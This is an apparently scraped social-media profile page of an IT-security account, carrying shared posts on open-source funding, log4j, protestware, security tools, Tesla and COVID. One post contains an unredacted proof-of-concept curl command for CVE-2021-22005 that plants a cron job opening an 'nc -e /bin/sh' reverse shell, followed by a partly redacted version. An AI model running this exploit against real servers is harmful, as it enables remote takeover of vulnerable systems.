Hackarandas Blog
@hackarandas
Where ideas are dispersed in bytes... ITSec Blog - owner: @ch0ks
You might like
What a time to be alive!
Big Tech engineers, don’t let your skills rot. Make sure you are always trying new technologies, languages and frameworks on your spare time/evenings and write software to unionize your company.
Researchers are tracking a number of open-source code packages on GitHub that are being turned into "protestware," code that displays anti-war messages or casualty stats to users w/ RU or Belarusian IPs. Other protestware wipes files for RU/BY users. krebsonsecurity.com/2022/03/pro-uk…
Don't bash open-source developers and maintainers, please. Bugs happen, and the software is free. Hate the bug, not the dev.
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Watching this log4j bug metastasize, I’m seeing people ask why industry doesn’t fund open source. I don’t have a great answer, but I have some thoughts following the experience with Heartbleed in ‘14. 1/
Wanna know if the web app you are building is secure? Here is a tutorial on how to test the security of any web app in 3 min with nuclei, an open-source and developer-friendly app security scanner blog.escape.tech/devsecops-part… (👋 @pdnuclei)
Kubernetes-Goat - Is A "Vulnerable By Design" Kubernetes Cluster. Designed To Be An Intentionally Vulnerable Cluster Environment To Learn And Practice Kubernetes Security kitploit.com/2021/11/kubern…
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444"
Redacted RCE PoC: 1. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/$RANDOM" -H Content-Type: -d "" 2. curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../[redacted]" -H Content-Type: -d "[redacted]"
Adding more people to a project
Mindmap 🧠 for pass-the-whatever and common attacks operated on Active Directory authentication protocols (NTLM, Kerberos) ➡️ Featured on thehacker.recipes
Can hardly believe it. This is Windows 10 in 2021.
Finally a use for all those remote hacks on Teslas.
Tesla Model Y Police Vehicle Makes World Debut in New York 🚔⚡️🗽 tesmanian.com/blogs/tesmania… $TSLA #Tesla #EV @elonmusk 🎥: @HastingsPD
Sporting this shirt today bc apparently this is the theme of the day at work
We don’t know what to say, other than thank you! We can’t believe this is real, we did it! We want to thank each and every one of you who helped save #Caltrain, we couldn’t have done it without you. This is a historic moment for transit in the Bay Area and it's all thanks to you!
Wow, this is utterly bullshit.
Tesla Model Y Police Vehicle Makes World Debut in New York 🚔⚡️🗽 tesmanian.com/blogs/tesmania… $TSLA #Tesla #EV @elonmusk 🎥: @HastingsPD
Fuck COVID19
#defcon28 has entered Safe Mode. The #DEFCONiscanceled meme has crossed over into real life, courtesy of #COVID19. In early March we had hopes that things would be stable by August. That is no longer realistic.
i heard having no taste is a symptom of COVID-19. i hope everyone that prefers windows is okay! 🖤
Please help these people to recover their channel! Every retweet counts! #anutricionaltvregresa @TeamYouTube @YouTube @anutricional
RT por favor. Ayudemos a una gran nutriólogo mexicana a recuperar su canal! #anutricionaltvregresa @TeamYouTube @YouTube
![draednaut's profile picture. Director of Security @ Cisco Meraki. Stealthy as a hand grenade. [they/them]](https://pbs.twimg.com/profile_images/657276500098461697/AWL2ar2r.jpg)
United States Trends
- 1. Luka N/A
- 2. Clippers N/A
- 3. Dr Pepper N/A
- 4. Manon N/A
- 5. Tucker N/A
- 6. #SmackDown N/A
- 7. $Lobstar N/A
- 8. #DistrictV N/A
- 9. #LakeShow N/A
- 10. #DragRace N/A
- 11. Ayton N/A
- 12. Batum N/A
- 13. Huckabee N/A
- 14. Marcus Smart N/A
- 15. Austin Reaves N/A
- 16. #PrestigeRoseland N/A
- 17. Ty Lue N/A
- 18. Kris Dunn N/A
- 19. John Collins N/A
- 20. WILLIAM X BEAUTYFAIR2026 N/A
Something went wrong.
Something went wrong.